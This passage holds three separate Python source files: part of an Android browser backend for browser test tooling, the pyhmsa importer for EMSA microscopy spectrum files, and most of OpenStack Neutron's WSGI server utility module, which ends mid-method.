for line in subprocess.check_output(['netstat', '-t']).splitlines():
logging.warning(' %s', line)
except Exception:
logging.warning('Exception raised while listing tcp ports.')
logging.warning('Device unix domain sockets in use:')
try:
for line in self.device.ReadFile('/proc/net/unix', as_root=True,
force_pull=True).splitlines():
logging.warning(' %s', line)
except Exception:
logging.warning('Exception raised while listing unix domain sockets.')
raise
try:
self._WaitForBrowserToComeUp()
self._InitDevtoolsClientBackend(remote_devtools_port)
except exceptions.BrowserGoneException:
logging.critical('Failed to connect to browser.')
if not (self.device.HasRoot() or self.device.NeedsSU()):
logging.critical(
'Resolve this by either: '
'(1) Flashing to a userdebug build OR '
'(2) Manually enabling web debugging in Chrome at '
'Settings > Developer tools > Enable USB Web debugging.')
self.Close()
raise
except:
self.Close()
raise
def GetBrowserStartupArgs(self):
args = super(AndroidBrowserBackend, self).GetBrowserStartupArgs()
args.append('--enable-remote-debugging')
args.append('--disable-fre')
args.append('--disable-external-intent-requests')
return args
@property
def pid(self):
pids = self.device.GetPids(self._backend_settings.package)
if not pids or self._backend_settings.package not in pids:
raise exceptions.BrowserGoneException(self.browser)
if len(pids[self._backend_settings.package]) > 1:
raise Exception(
'At most one instance of process %s expected but found pids: '
'%s' % (self._backend_settings.package, pids))
return int(pids[self._backend_settings.package][0])
@property
def browser_directory(self):
return None
@property
def profile_directory(self):
return self._backend_settings.profile_dir
@property
def package(self):
return self._backend_settings.package
@property
def activity(self):
return self._backend_settings.activity
def __del__(self):
self.Close()
def Close(self):
super(AndroidBrowserBackend, self).Close()
self.platform_backend.RemoveTestCa()
self._KillBrowser()
self.platform_backend.StopForwardingHost(self._port)
if self._output_profile_path:
self.platform_backend.PullProfile(
self._backend_settings.package, self._output_profile_path)
def IsBrowserRunning(self):
return self.platform_backend.IsAppRunning(self._backend_settings.package)
def GetStandardOutput(self):
return self.platform_backend.GetStandardOutput()
def GetStackTrace(self):
return self.platform_backend.GetStackTrace(self._target_arch)
@property
def should_ignore_certificate_errors(self):
return not self.platform_backend.is_test_ca_installed
|
|
"""
Importer from EMSA file format
"""
# Standard library modules.
import datetime
# Third party modules.
import numpy as np
# Local modules.
from pyhmsa.fileformat.importer.importer import _Importer, _ImporterThread
from pyhmsa.fileformat.common.emsa import calculate_checksum
from pyhmsa.datafile import DataFile
from pyhmsa.spec.header import Header
from pyhmsa.spec.condition.probe import ProbeEM, ProbeTEM
from pyhmsa.spec.condition.acquisition import AcquisitionPoint
from pyhmsa.spec.condition.specimenposition import SpecimenPosition
from pyhmsa.spec.condition.detector import \
(DetectorSpectrometer, DetectorSpectrometerXEDS, DetectorSpectrometerCL,
Window)
from pyhmsa.spec.condition.calibration import CalibrationLinear
from pyhmsa.spec.datum.analysis import Analysis1D
from pyhmsa.type.unit import validate_unit
from pyhmsa.util.parsedict import parsedict
# Globals and constants variables.
from pyhmsa.spec.condition.detector import \
(COLLECTION_MODE_PARALLEL, COLLECTION_MODE_SERIAL,
XEDS_TECHNOLOGY_GE, XEDS_TECHNOLOGY_SILI, XEDS_TECHNOLOGY_SDD,
XEDS_TECHNOLOGY_UCAL,
SIGNAL_TYPE_EDS, SIGNAL_TYPE_WDS, SIGNAL_TYPE_CLS)
from pyhmsa.fileformat.common.emsa import \
(EMSA_ELS_DETECTOR_SERIAL, EMSA_ELS_DETECTOR_PARALL,
EMSA_EDS_DETECTOR_SIBEW, EMSA_EDS_DETECTOR_SIUTW, EMSA_EDS_DETECTOR_SIWLS,
EMSA_EDS_DETECTOR_GEBEW, EMSA_EDS_DETECTOR_GEUTW, EMSA_EDS_DETECTOR_GEWLS,
EMSA_EDS_DETECTOR_SDBEW, EMSA_EDS_DETECTOR_SDUTW, EMSA_EDS_DETECTOR_SDWLS,
EMSA_EDS_DETECTOR_UCALUTW)
_ELSDET_TO_COLLECTION_MODE = \
{EMSA_ELS_DETECTOR_PARALL: COLLECTION_MODE_PARALLEL,
EMSA_ELS_DETECTOR_SERIAL: COLLECTION_MODE_SERIAL}
_EDSDET_TO_XEDS_TECHNOLOGY = \
{EMSA_EDS_DETECTOR_SIBEW: XEDS_TECHNOLOGY_SILI,
EMSA_EDS_DETECTOR_SIUTW: XEDS_TECHNOLOGY_SILI,
EMSA_EDS_DETECTOR_SIWLS: XEDS_TECHNOLOGY_SILI,
EMSA_EDS_DETECTOR_GEBEW: XEDS_TECHNOLOGY_GE,
EMSA_EDS_DETECTOR_GEUTW: XEDS_TECHNOLOGY_GE,
EMSA_EDS_DETECTOR_GEWLS: XEDS_TECHNOLOGY_GE,
EMSA_EDS_DETECTOR_SDBEW: XEDS_TECHNOLOGY_SDD,
EMSA_EDS_DETECTOR_SDUTW: XEDS_TECHNOLOGY_SDD,
EMSA_EDS_DETECTOR_SDWLS: XEDS_TECHNOLOGY_SDD,
EMSA_EDS_DETECTOR_UCALUTW: XEDS_TECHNOLOGY_UCAL}
class _ImporterEMSAThread(_ImporterThread):
def _run(self, filepath, *args, **kwargs):
emsa_file = None
try:
# Parse EMSA file
emsa_file = open(filepath, 'rt')
lines = emsa_file.readlines()
self._update_status(0.1, 'Verify checksum')
self._verify_checksum(lines)
self._update_status(0.2, 'Parse keywords')
keywords = self._parse_keywords(lines)
self._update_status(0.3, 'Parse data')
buffer = self._parse_data(lines, keywords)
# Create data file
datafile = DataFile()
self._update_status(0.4, 'Extracting header')
datafile.header.update(self._extract_header(keywords))
self._update_status(0.5, 'Extracting probe')
datafile.conditions.update(self._extract_probe(keywords))
self._update_status(0.6, 'Extracting acquisition')
datafile.conditions.update(self._extract_acquisition(keywords))
self._update_status(0.7, 'Extracting detector')
datafile.conditions.update(self._extract_detector(keywords))
datum = Analysis1D(len(buffer), dtype=buffer.dtype,
buffer=np.ravel(buffer),
conditions=datafile.conditions)
datafile.data['Spectrum'] = datum
finally:
if emsa_file is not None:
emsa_file.close()
return datafile
def _is_line_keyword(self, line):
try:
return line.strip()[0] == '#'
except:
return False
def _verify_checksum(self, lines):
for line in lines:
if not self._is_line_keyword(line):
continue
tag, _comment, expected_checksum = self._parse_keyword_line(line)
if tag == 'ENDOFDATA':
return # No checksum
if tag == 'CHECKSUM':
break
actual_checksum = calculate_checksum(lines)
if actual_checksum != expected_checksum:
raise IOError("The checksums don't match: %i != %i " % \
(actual_checksum, expected_checksum))
def _parse_keywords(self, lines):
keywords = parsedict()
# First pass
for line in lines:
if not self._is_line_keyword(line):
break
tag, _comment, value = self._parse_keyword_line(line)
if tag == 'SPECTRUM':
break
keywords.setdefault(tag, []).append(value)
# Second pass (remove list if only one value)
for tag, values in keywords.items():
if len(values) == 1:
keywords[tag] = values[0]
else:
keywords[tag] = tuple(values)
return keywords
def _parse_keyword_line(self, line):
line = line.strip("#") # Strip keyword character
tag, value = line.split(":", 1)
tag = tag.strip()
value = value.strip()
try:
tag, comment = tag.split()
except:
comment = ""
tag = tag.upper()
comment = comment.strip("-")
return tag, comment, value
def _parse_data(self, lines, keywords):
# Filter to get only data lines
lines = filter(lambda line: not self._is_line_keyword(line), lines)
# Read based on data type
datatype = keywords.get('DATATYPE')
if datatype is None:
raise ValueError('No DATATYPE specified')
datatype = datatype.upper()
if datatype == 'XY':
data = self._parse_data_xy(lines, keywords)
elif datatype == 'Y':
data = self._parse_data_y(lines, keywords)
else:
raise ValueError('Unknown data type')
# Check number of points
npoints = int(float(keywords.get('NPOINTS', len(data))))
if npoints != len(data):
raise ValueError('Inconsistent number of points. NPOINTS=%i != len(data)=%i' % \
(npoints, len(data)))
return data
def _parse_data_xy(self, lines, keywords):
data = []
for line in lines:
data.append(self._parse_data_line(line))
return np.array(data)[:, 1]
def _parse_data_y(self, lines, keywords):
ydata = []
for line in lines:
ydata.extend(self._parse_data_line(line))
return np.array(ydata)
def _parse_data_line(self, line):
# Split values separated by a comma
tmprow = [value.strip() for value in line.split(',')]
# Split values separated by a space
row = []
for value in tmprow:
row.extend(value.split())
# Convert to float
row = list(map(float, row))
return row
def _extract_header(self, keywords):
header = Header()
header.title = keywords['TITLE']
header.date = \
datetime.datetime.strptime(keywords['DATE'], '%d-%b-%Y').date()
header.time = \
datetime.datetime.strptime(keywords['TIME'], '%H:%M').time()
header.author = keywords['OWNER']
return header
def _extract_probe(self, keywords):
if 'BEAMKV' not in keywords:
return {}
kwargs = {}
kwargs['beam_voltage'] = (keywords.getfloat('BEAMKV'), 'kV')
kwargs['beam_current'] = (keywords.getfloat('PROBECUR'), 'nA')
kwargs['emission_current'] = (keywords.getfloat('EMISSION'), 'uA')
kwargs['beam_diameter'] = (keywords.getfloat('BEAMDIAM'), 'nm')
kwargs['scan_magnification'] = keywords.getint('MAGCAM')
if 'OPERMODE' in keywords:
kwargs['lens_mode'] = keywords.get('OPERMODE') # Enums are identical
kwargs['convergence_angle'] = (keywords.getfloat('CONVANGLE'), 'mrad')
c = ProbeTEM(**kwargs)
else:
c = ProbeEM(**kwargs)
return {'Probe0': c}
def _extract_acquisition(self, keywords):
if 'XPOSITION' not in keywords or \
'YPOSITION' not in keywords or \
'ZPOSITION' not in keywords:
return {}
position = SpecimenPosition(x=keywords.getfloat('XPOSITION'),
y=keywords.getfloat('YPOSITION'),
z=keywords.getfloat('ZPOSITION')) #FIXME: Handle XTILTSTGE and YTILTSTGE
dwell_time = (keywords.getfloat('DWELLTIME'), 'ms')
if 'INTEGTIME' in keywords:
total_time = (keywords.getfloat('INTEGTIME'), 'ms')
else:
total_time = (keywords.getfloat('REALTIME'), 's')
dwell_time_live = (keywords.getfloat('LIVETIME'), 's')
c = AcquisitionPoint(position, dwell_time, total_time, dwell_time_live)
return {'Acq0': c}
def _extract_detector(self, keywords):
if 'SIGNALTYPE' not in keywords:
return {}
signal_type = keywords.get('SIGNALTYPE') # Enums is identical
kwargs = {}
kwargs['signal_type'] = signal_type
kwargs['channel_count'] = keywords.getint('NPOINTS')
quantity = keywords.get('XLABEL', 'Energy')
unit = keywords.get('XUNITS')
gain = keywords.getfloat('XPERCHAN')
offset = keywords.getfloat('OFFSET')
try:
unit = validate_unit(unit)
except ValueError as ex: # Attempt quick fix for common unit
if 'angstroms' in unit:
unit = 'nm'
gain /= 10.0
offset /= 10.0
elif 'eV' in unit:
unit = 'eV'
else:
raise ex
kwargs['calibration'] = CalibrationLinear(quantity, unit, gain, offset)
kwargs['measurement_unit'] = keywords.get('yunits')
kwargs['elevation'] = (keywords.getfloat('ELEVANGLE'), 'degrees')
kwargs['azimuth'] = (keywords.getfloat('AZIMANGLE'), 'degrees')
kwargs['solid_angle'] = (keywords.getfloat('SOLIDANGLE'), 'sr')
kwargs['semi_angle'] = (keywords.getfloat('COLLANGLE'), 'mrad')
kwargs['collection_mode'] = \
_ELSDET_TO_COLLECTION_MODE.get(keywords.get('ELSDET'))
if signal_type in [SIGNAL_TYPE_EDS, SIGNAL_TYPE_WDS]:
window = Window()
if 'TDEADLYR' in keywords:
window.append_layer('Dead layer', (keywords.getfloat('TDEADLYR') * 1e4, 'um'))
if 'TACTLYR' in keywords:
window.append_layer('Active Layer', (keywords.getfloat('TACTLYR') * 1e4, 'um'))
if 'TBEWIND' in keywords:
window.append_layer('Be window', (keywords.getfloat('TBEWIND') * 1e4, 'um'))
if 'TAUWIND' in keywords:
window.append_layer('Au window', (keywords.getfloat('TAUWIND') * 1e4, 'um'))
if 'TALWIND' in keywords:
window.append_layer('Al window', (keywords.getfloat('TALWIND') * 1e4, 'um'))
if 'TPYWIND' in keywords:
window.append_layer('Pyrolene window', (keywords.getfloat('TPYWIND') * 1e4, 'um'))
if 'TBNWIND' in keywords:
window.append_layer('Boron-Nitride window', (keywords.getfloat('TBNWIND') * 1e4, 'um'))
if 'TDIWIND' in keywords:
window.append_layer('Diamond window', (keywords.getfloat('TDIWIND') * 1e4, 'um'))
if 'THCWIND' in keywords:
window.append_layer('HydroCarbon window', (keywords.getfloat('TDIWIND') * 1e4, 'um'))
if window.layers:
kwargs['window'] = window
if signal_type == SIGNAL_TYPE_EDS:
kwargs['technology'] = \
_EDSDET_TO_XEDS_TECHNOLOGY.get(keywords.get('EDSDET'))
c = DetectorSpectrometerXEDS(**kwargs)
elif signal_type == SIGNAL_TYPE_CLS:
c = DetectorSpectrometerCL(**kwargs)
else:
c = DetectorSpectrometer(**kwargs)
return {signal_type: c}
class ImporterEMSA(_Importer):
SUPPORTED_EXTENSIONS = ('.emsa',)
def _create_thread(self, filepath, *args, **kwargs):
return _ImporterEMSAThread(filepath)
|
|
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility methods for working with WSGI servers
"""
from __future__ import print_function
import errno
import os
import socket
import ssl
import sys
import time
import eventlet.wsgi
eventlet.patcher.monkey_patch(all=False, socket=True, thread=True)
from oslo.config import cfg
from oslo import i18n
from oslo.serialization import jsonutils
from oslo.utils import excutils
import routes.middleware
import webob.dec
import webob.exc
from neutron.common import exceptions as exception
from neutron import context
from neutron.db import api
from neutron.i18n import _LE, _LI
from neutron.openstack.common import log as logging
from neutron.openstack.common import service as common_service
from neutron.openstack.common import systemd
socket_opts = [
cfg.IntOpt('backlog',
default=4096,
help=_("Number of backlog requests to configure "
"the socket with")),
cfg.IntOpt('tcp_keepidle',
default=600,
help=_("Sets the value of TCP_KEEPIDLE in seconds for each "
"server socket. Not supported on OS X.")),
cfg.IntOpt('retry_until_window',
default=30,
help=_("Number of seconds to keep retrying to listen")),
cfg.IntOpt('max_header_line',
default=16384,
help=_("Max header line to accommodate large tokens")),
cfg.BoolOpt('use_ssl',
default=False,
help=_('Enable SSL on the API server')),
cfg.StrOpt('ssl_ca_file',
help=_("CA certificate file to use to verify "
"connecting clients")),
cfg.StrOpt('ssl_cert_file',
help=_("Certificate file to use when starting "
"the server securely")),
cfg.StrOpt('ssl_key_file',
help=_("Private key file to use when starting "
"the server securely")),
]
CONF = cfg.CONF
CONF.register_opts(socket_opts)
LOG = logging.getLogger(__name__)
class WorkerService(object):
"""Wraps a worker to be handled by ProcessLauncher"""
def __init__(self, service, application):
self._service = service
self._application = application
self._server = None
def start(self):
# We may have just forked from parent process. A quick disposal of the
# existing sql connections avoids producting 500 errors later when they
# are discovered to be broken.
api.get_engine().pool.dispose()
self._server = self._service.pool.spawn(self._service._run,
self._application,
self._service._socket)
def wait(self):
if isinstance(self._server, eventlet.greenthread.GreenThread):
self._server.wait()
def stop(self):
if isinstance(self._server, eventlet.greenthread.GreenThread):
self._server.kill()
self._server = None
class Server(object):
"""Server class to manage multiple WSGI sockets and applications."""
def __init__(self, name, threads=1000):
# Raise the default from 8192 to accommodate large tokens
eventlet.wsgi.MAX_HEADER_LINE = CONF.max_header_line
self.pool = eventlet.GreenPool(threads)
self.name = name
self._server = None
def _get_socket(self, host, port, backlog):
bind_addr = (host, port)
# TODO(dims): eventlet's green dns/socket module does not actually
# support IPv6 in getaddrinfo(). We need to get around this in the
# future or monitor upstream for a fix
try:
info = socket.getaddrinfo(bind_addr[0],
bind_addr[1],
socket.AF_UNSPEC,
socket.SOCK_STREAM)[0]
family = info[0]
bind_addr = info[-1]
except Exception:
LOG.exception(_LE("Unable to listen on %(host)s:%(port)s"),
{'host': host, 'port': port})
sys.exit(1)
if CONF.use_ssl:
if not os.path.exists(CONF.ssl_cert_file):
raise RuntimeError(_("Unable to find ssl_cert_file "
": %s") % CONF.ssl_cert_file)
# ssl_key_file is optional because the key may be embedded in the
# certificate file
if CONF.ssl_key_file and not os.path.exists(CONF.ssl_key_file):
raise RuntimeError(_("Unable to find "
"ssl_key_file : %s") % CONF.ssl_key_file)
# ssl_ca_file is optional
if CONF.ssl_ca_file and not os.path.exists(CONF.ssl_ca_file):
raise RuntimeError(_("Unable to find ssl_ca_file "
": %s") % CONF.ssl_ca_file)
def wrap_ssl(sock):
ssl_kwargs = {
'server_side': True,
'certfile': CONF.ssl_cert_file,
'keyfile': CONF.ssl_key_file,
'cert_reqs': ssl.CERT_NONE,
}
if CONF.ssl_ca_file:
ssl_kwargs['ca_certs'] = CONF.ssl_ca_file
ssl_kwargs['cert_reqs'] = ssl.CERT_REQUIRED
return ssl.wrap_socket(sock, **ssl_kwargs)
sock = None
retry_until = time.time() + CONF.retry_until_window
while not sock and time.time() < retry_until:
try:
sock = eventlet.listen(bind_addr,
backlog=backlog,
family=family)
if CONF.use_ssl:
sock = wrap_ssl(sock)
except socket.error as err:
with excutils.save_and_reraise_exception() as ctxt:
if err.errno == errno.EADDRINUSE:
ctxt.reraise = False
eventlet.sleep(0.1)
if not sock:
raise RuntimeError(_("Could not bind to %(host)s:%(port)s "
"after trying for %(time)d seconds") %
{'host': host,
'port': port,
'time': CONF.retry_until_window})
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# sockets can hang around forever without keepalive
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# This option isn't available in the OS X version of eventlet
if hasattr(socket, 'TCP_KEEPIDLE'):
sock.setsockopt(socket.IPPROTO_TCP,
socket.TCP_KEEPIDLE,
CONF.tcp_keepidle)
return sock
def start(self, application, port, host='0.0.0.0', workers=0):
"""Run a WSGI server with the given application."""
self._host = host
self._port = port
backlog = CONF.backlog
self._socket = self._get_socket(self._host,
self._port,
backlog=backlog)
self._launch(application, workers)
def _launch(self, application, workers=0):
service = WorkerService(self, application)
if workers < 1:
# The API service should run in the current process.
self._server = service
service.start()
systemd.notify_once()
else:
# The API service runs in a number of child processes.
# Minimize the cost of checking for child exit by extending the
# wait interval past the default of 0.01s.
self._server = common_service.ProcessLauncher(wait_interval=1.0)
self._server.launch_service(service, workers=workers)
@property
def host(self):
return self._socket.getsockname()[0] if self._socket else self._host
@property
def port(self):
return self._socket.getsockname()[1] if self._socket else self._port
def stop(self):
self._server.stop()
def wait(self):
"""Wait until all servers have completed running."""
try:
self._server.wait()
except KeyboardInterrupt:
pass
def _run(self, application, socket):
"""Start a WSGI server in a new green thread."""
eventlet.wsgi.server(socket, application, custom_pool=self.pool,
log=logging.WritableLogger(LOG))
class Middleware(object):
"""Base WSGI middleware wrapper.
These classes require an application to be initialized that will be called
next. By default the middleware will simply call its wrapped app, or you
can override __call__ to customize its behavior.
"""
@classmethod
def factory(cls, global_config, **local_config):
"""Used for paste app factories in paste.deploy config files.
Any local configuration (that is, values under the [filter:APPNAME]
section of the paste config) will be passed into the `__init__` method
as kwargs.
A hypothetical configuration would look like:
[filter:analytics]
redis_host = 127.0.0.1
paste.filter_factory = nova.api.analytics:Analytics.factory
which would result in a call to the `Analytics` class as
import nova.api.analytics
analytics.Analytics(app_from_paste, redis_host='127.0.0.1')
You could of course re-implement the `factory` method in subclasses,
but using the kwarg passing it shouldn't be necessary.
"""
def _factory(app):
return cls(app, **local_config)
return _factory
def __init__(self, application):
self.application = application
def process_request(self, req):
"""Called on each request.
If this returns None, the next application down the stack will be
executed. If it returns a response then that response will be returned
and execution will stop here.
"""
return None
def process_response(self, response):
"""Do whatever you'd like to the response."""
return response
@webob.dec.wsgify
def __call__(self, req):
response = self.process_request(req)
if response:
return response
response = req.get_response(self.application)
return self.process_response(response)
class Request(webob.Request):
def best_match_content_type(self):
"""Determine the most acceptable content-type.
Based on:
1) URI extension (.json)
2) Content-type header
3) Accept* headers
"""
# First lookup http request path
parts = self.path.rsplit('.', 1)
if len(parts) > 1:
_format = parts[1]
if _format in ['json']:
return 'application/{0}'.format(_format)
#Then look up content header
type_from_header = self.get_content_type()
if type_from_header:
return type_from_header
ctypes = ['application/json']
#Finally search in Accept-* headers
bm = self.accept.best_match(ctypes)
return bm or 'application/json'
def get_content_type(self):
allowed_types = ("application/json")
if "Content-Type" not in self.headers:
LOG.debug("Missing Content-Type")
return None
_type = self.content_type
if _type in allowed_types:
return _type
return None
def best_match_language(self):
"""Determines best available locale from the Accept-Language header.
:returns: the best language match or None if the 'Accept-Language'
header was not available in the request.
"""
if not self.accept_language:
return None
all_languages = i18n.get_available_languages('neutron')
return self.accept_language.best_match(all_languages)
@property
def context(self):
if 'neutron.context' not in self.environ:
self.environ['neutron.context'] = context.get_admin_context()
return self.environ['neutron.context']
class ActionDispatcher(object):
"""Maps method name to local methods through action name."""
def dispatch(self, *args, **kwargs):
"""Find and call local method."""
action = kwargs.pop('action', 'default')
action_method = getattr(self, str(action), self.default)
return action_method(*args, **kwargs)
def default(self, data):
raise NotImplementedError()
class DictSerializer(ActionDispatcher):
"""Default request body serialization."""
def serialize(self, data, action='default'):
return self.dispatch(data, action=action)
def default(self, data):
return ""
class JSONDictSerializer(DictSerializer):
"""Default JSON request body serialization."""
def default(self, data):
def sanitizer(obj):
return unicode(obj)
return jsonutils.dumps(data, default=sanitizer)
class ResponseHeaderSerializer(ActionDispatcher):
"""Default response headers serialization."""
def serialize(self, response, data, action):
self.dispatch(response, data, action=action)
def default(self, response, data):
response.status_int = 200
class ResponseSerializer(object):
"""Encode the necessary pieces into a response object."""
def __init__(self, body_serializers=None, headers_serializer=None):
self.body_serializers = {
'application/json': JSONDictSerializer(),
}
self.body_serializers.update(body_serializers or {})
self.headers_serializer = (headers_serializer or
ResponseHeaderSerializer())
def serialize(self, response_data, content_type, action='default'):
"""Serialize a dict into a string and wrap in a wsgi.Request object.
:param response_data: dict produced by the Controller
:param content_type: expected mimetype of serialized response body
"""
response = webob.Response()
self.serialize_headers(response, response_data, action)
self.serialize_body(response, response_data, content_type, action)
return response
def serialize_headers(self, response, data, action):
self.headers_serializer.serialize(response, data, action)
def serialize_body(self, response, data, content_type, action):
response.headers['Content-Type'] = content_type
if data is not None:
serializer = self.get_body_serializer(content_type)
response.body = serializer.serialize(data, action)
def get_body_serializer(self, content_type):
try:
return self.body_serializers[content_type]
except (KeyError, TypeError):
raise exception.InvalidContentType(content_type=content_type)
class TextDeserializer(ActionDispatcher):
"""Default request body deserialization."""
def deserialize(self, datastring, action='default'):
return self.dispatch(datastring, action=action)
def default(self, datastring):
return {}
class JSONDeserializer(TextDeserializer):
def _from_json(self, datastring):
try:
return jsonutils.loads(datastring)
except ValueError:
msg = _("Cannot understand JSON")
raise exception.MalformedRequestBody(reason=msg)
def default(self, datastring):
return {'body': self._from_json(datastring)}
class RequestHeadersDeserializer(ActionDispatcher):
"""Default request headers deserializer."""
def deserialize(self, request, action):
return self.dispatch(request, action=action)
def default(self, request):
return {}
class RequestDeserializer(object):
"""Break up a Request object into more useful pieces."""
def __init__(self, body_deserializers=None, headers_deserializer=None):
self.body_deserializers = {
'application/json': JSONDeserializer(),
}
self.body_deserializers.update(body_deserializers or {})
self.headers_deserializer = (headers_deserializer or
RequestHeadersDeserializer())
def deserialize(self, request):
"""Extract necessary pieces of the request.
:param request: Request object
:returns tuple of expected controller action name, dictionary of
keyword arguments to pass to the controller, the expected
content type of the response
"""
action_args = self.get_action_args(request.environ)
action = action_args.pop('action', None)
action_args.update(self.deserialize_headers(request, action))
action_args.update(self.deserialize_body(request, action))
accept = self.get_expected_content_type(request)
return (action, action_args, accept)
def deserialize_headers(self, request, action):
return self.headers_deserializer.deserialize(request, action)
def deserialize_body(self, request, action):
try:
content_type = request.best_match_content_type()
except exception.InvalidContentType:
LOG.debug("Unrecognized Content-Type provided in request")
return {}
if content_type is None:
LOG.debug("No Content-Type provided in request")
return {}
if not len(request.body) > 0:
LOG.debug("Empty body provided in request")
return {}
try:
deserializer = self.get_body_deserializer(content_type)
except exception.InvalidContentType:
with excutils.save_and_reraise_exception():
LOG.debug("Unable to deserialize body as provided "
"Content-Type")
return deserializer.deserialize(request.body, action)
def get_body_deserializer(self, content_type):
try:
return self.body_deserializers[content_type]
except (KeyError, TypeError):
raise exception.InvalidContentType(content_type=content_type)
def get_expected_content_type(self, request):
return request.best_match_content_type()
def get_action_args(self, request_environment):
"""Parse dictionary created by routes library."""
try:
args = request_environment['wsgiorg.routing_args'][1].copy()
except Exception:
return {}
try:
del args['controller']
except KeyError:
pass
try:
del args['format']
except KeyError:
pass
return args
class Application(object):
"""Base WSGI application wrapper. Subclasses need to implement __call__."""
@classmethod
def factory(cls, global_config, **local_config):
"""Used for paste app factories in paste.deploy config files.
Any local configuration (that is, values under the [app:APPNAME]
section of the paste config) will be passed into the `__init__` method
as kwargs.
A hypothetical configuration would look like:
[app:wadl]
latest_version = 1.3
paste.app_factory = nova.api.fancy_api:Wadl.factory
which would result in a call to the `Wadl` class as
import neutron.api.fancy_api
fancy_api.Wadl(latest_version='1.3')
You could of course re-implement the `factory` method in subclasses,
but using the kwarg passing it shouldn't be necessary.
"""
return cls(**local_config)
def __call__(self, environ, start_response):
r"""Subclasses will probably want to implement __call__ like this:
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, req):
# Any of the following objects work as responses:
# Option 1: simple string
res = 'message\n'
# Option 2: a nicely formatted HTTP exception page
res = exc.HTTPForbidden(explanation='Nice try')
# Option 3: a webob Response object (in case you need to play with
# headers, or you want to be treated like an iterable, or or or)
res = Response();
res.app_iter = open('somefile')
# Option 4: any wsgi app to be run next
res = self.application
# Option 5: you can get a Response object for a wsgi app, too, to
# play with headers etc
res = req.get_response(self.application)
# You can then just return your response...
return res
# ... or set req.response and return None.
req.response = res
See the end of http://pythonpaste.org/webob/modules/dec.html
for more info.
"""
raise NotImplementedError(_('You must implement __call__'))
class Debug(Middleware):
"""Middleware for debugging.
Helper class that can be inserted into any WSGI application chain
to get information about the request and response.
"""
@webob.dec.wsgify
def __call__(self, req):
print(("*" * 40) + " REQUEST ENVIRON")
for key, value in req.environ.items():
print(key, "=", value)
print()
resp = req.get_response(self.application)
print(("*" * 40) + " RESPONSE HEADERS")
for (key, value) in resp.headers.iteritems():
print(key, "=", value)
print()
resp.app_iter = self.print_generator(resp.app_iter)
return resp
@staticmethod
def print_generator(app_iter):
"""Print contents of a wrapper string iterator when iterated."""
print(("*" * 40) + " BODY")
for part in app_iter:
sys.stdout.write(part)
sys.stdout.flush()
yield part
print()
class Router(object):
"""WSGI middleware that maps incoming requests to WSGI apps."""
@classmethod
def factory(cls, global_config, **local_config):
"""Return an instance of the WSGI Router class."""
return cls()
def __init__(self, mapper):
"""Create a router for the given routes.Mapper.
Each route in `mapper` must specify a 'controller', which is a
WSGI app to call. You'll probably want to specify an 'action' as
well and have your controller be a wsgi.Controller, who will route
the request to the action method.
Examples:
mapper = routes.Mapper()
sc = ServerController()
# Explicit mapping of one route to a controller+action
mapper.connect(None, "/svrlist", controller=sc, action="list")
# Actions are all implicitly defined
mapper.resource("network", "networks", controller=nc)
# Pointing to an arbitrary WSGI app. You can specify the
# {path_info:.*} parameter so the target app can be handed just that
# section of the URL.
mapper.connect(None, "/v1.0/{path_info:.*}", controller=BlogApp())
"""
self.map = mapper
self._router = routes.middleware.RoutesMiddleware(self._dispatch,
self.map)
@webob.dec.wsgify
def __call__(self, req):
"""Route the incoming request to a controller based on self.map.
If no match, return a 404.
"""
return self._router
@staticmethod
@webob.dec.wsgify(RequestClass=Request)
def _dispatch(req):
"""Dispatch a Request.
Called by self._router after matching the incoming request to a route
and putting the information into req.environ. Either returns 404
or the routed WSGI app's response.
"""
match = req.environ['wsgiorg.routing_args'][1]
if not match:
language = req.best_match_language()
msg = _('The resource could not be found.')
msg = i18n.translate(msg, language)
return webob.exc.HTTPNotFound(explanation=msg)
app = match['controller']
return app
class Resource(Application):
"""WSGI app that handles (de)serialization and controller dispatch.
WSGI app that reads routing information supplied by RoutesMiddleware
and calls the requested action method upon its controller. All
controller action methods must accept a 'req' argument, which is the
incoming wsgi.Request. If the operation is a PUT or POST, the controller
method must also accept a 'body' argument (the deserialized request body).
They may raise a webob.exc exception or return a dict, which will be
serialized by requested content type.
"""
def __init__(self, controller, fault_body_function,
deserializer=None, serializer=None):
"""Object initialization.
:param controller: object that implement methods created by routes lib
:param deserializer: object that can serialize the output of a
controller into a webob response
:param serializer: object that can deserialize a webob request
into necessary pieces
:param fault_body_function: a function that will build the response
body for HTTP errors raised by operations
on this resource object
"""
self.controller = controller
self.deserializer = deserializer or RequestDeserializer()
self.serializer = serializer or ResponseSerializer()
self._fault_body_function = fault_body_function
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, request):
"""WSGI method that controls (de)serialization and method dispatch."""
LOG.info(_LI("%(method)s %(url)s"),
{"method": request.method, "url": request.url})
try:
action, args, accept = self.deserializer.deserialize(request)
except exception.InvalidContentType:
msg = _("Unsupported Content-Type")
LOG.exception(_LE("InvalidContentType: %s"), msg)
return Fault(webob.exc.HTTPBadRequest(explanation=msg))
except exception.MalformedRequestBody:
msg = _("Malformed request body")
LOG.exception(_LE("MalformedRequestBody: %s"), msg)
return Fault(webob.exc.HTTPBadRequest(explanation=msg))
try:
action_result = self.dispatch(request, action, args)
except webob.exc.HTTPException as ex:
LOG.info(_LI("HTTP exception thrown: %s"), ex)
action_result = Fault(ex, self._fault_body_function)
except Exception:
LOG.exception(_LE("Internal error"))
# Do not include the traceback to avoid returning it to clients.
action_result = Fault(webob.exc.HTTPServerError(),
self._fault_body_function)
if isinstance(action_result, dict) or action_result is None:
response = self.serializer.serialize(action_result,
accept,
action=action)
else:
response = action_result
try:
LOG.info(_LI("%(url)s returned with HTTP %(status)d"),
dict(url=request.url, status=response.status_int))
except AttributeError as e:
LOG.info(_LI("%(url)s returned a fault: %(exception)s"),
dict(url=request.url, exception=e))
return response
def dispatch(self, request, action, action_args):
"""Find action-spefic method on controller and call it."""
controller_method = getattr(self.controller, action)
try:
#NOTE(salvatore-orlando): the controller method must have
